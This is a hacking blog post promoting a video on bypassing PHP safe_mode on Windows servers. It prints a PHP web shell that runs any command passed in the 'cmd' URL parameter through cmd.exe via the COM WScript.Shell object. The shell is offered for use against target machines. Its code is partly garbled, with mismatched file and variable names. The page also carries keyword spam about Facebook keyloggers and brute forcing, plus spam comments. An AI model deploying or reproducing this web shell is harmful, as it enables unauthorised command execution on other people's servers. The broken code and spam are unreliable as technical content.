VIDEO How to bypass SAFE-MODE on WINDOWS BOX using php shell

I’ve just found a nice thread on h4cky0u.org forum about bypassing safe-mode ON , on any WINDOWS OS by using php shell which will allow us to execute / inject any command on target machine. This video is presented in Arabic languange , but it’s very easy to understand.

The PHP SHELL code :

<?php
//PHP COM extensions (inconsistent Win32) safe_mode bypass

$____suntzu = new COM(“WScript.Shell”);
$____suntzu->Run(‘c:\windows\system32\cmd.exe /c ‘.escapeshellarg($_GET[cmd]).’ > ‘.dirname($_SERVER[SCRIPT_FILENAME]).’/djekmani.txt’);
$____suntzoi=file(“suntzoi.txt”);
for ($i=0; $i<count($____djekmani); $i++) {echo nl2br(htmlentities($____djekmani[$i]));}

// *quote* from the php manual:
// There is no installation needed to use these functions; they are part of the PHP core.

// The windows version of PHP has built in support for this extension. You do not need to load any additional extension in order to use these functions.

// You are responsible for installing support for the various COM objects that you intend to use (such as MS Word);
// we don’t and can’t bundle all of those with PHP.
?>

See how it works.

Recenly search

Incoming search terms for the article:

shell safe modehow to bypass safe modebypass safemodebypass safe mode startsafe mode bypassbypass safemode on windowssafe mod bypass backslashSafe Mod Bypass Shell$____suntzu = new COM(WScript Shell);shell bypass safe_modeshell safe-modeShocking: Disgusting hidden message in Toy Story 3! bypassrsa bypassed in safe modephp shell bypasshow to bypass safemodehow to bypass safe mod onbypassing safe modebypass safe mode phpbypass safe mode onBypass safe modeBypass SAFEsql injection safe_mode,  
Popular Today naruto shippuden 170 videologcat physics walkthroughnaruto shippuden 168 videologfacebook spybacktrack 3shy enginevtunnelBackTrack tutorialbacktrack 3 tutorialfacebook photo viewerSee The Shocking Hidden Message In The Google Logo that GOOGLE Does NOT Want You To Know About!how to view private myspace picturesmy empire hackview private myspace picturesSHOCKING: RUDE HIDDEN MESSAGE in Toy Story 3!facebook keyloggerHIDDEN MESSAGE IN GOOGLE LOGOTerri Moulton Hormanrapidleechbrute force facebook,   Computer Security Stuff on eBay!
Electronics stuffs on ebay

7 Responses to “VIDEO How to bypass SAFE-MODE on WINDOWS BOX using php shell”

  1. [...] but it’s very easy to understand. The PHP SHELL code : Hacking, Hacking Videos, […] [Read the rest on (it)gossips network: lain] Related Postsphp-findsock-shell : another interesting web backdoorMake Your Own CGIProxy [...]

  2. Great very best

  3. Thx bro :) :)

  4. hellow nice job ;

    my video in here hhhhhh

    thanks man

  5. ysuvrrgdcnhqghzrwell, hi admin adn people nice forum indeed. how’s life? hope it’s introduce branch ;)

  6. hello it is test. WinRAR provides the full RAR and ZIP file support, can decompress CAB, GZIP, ACE and other archive formats.
    wpthdckmggxtmsefwumrqgucnipgwrmoaonhello

  7. [...] the internet. Note that the PHP safe_mode must be turned off. Depending on OS and PHP version you can bypass the safe_mode [...]

Leave a Reply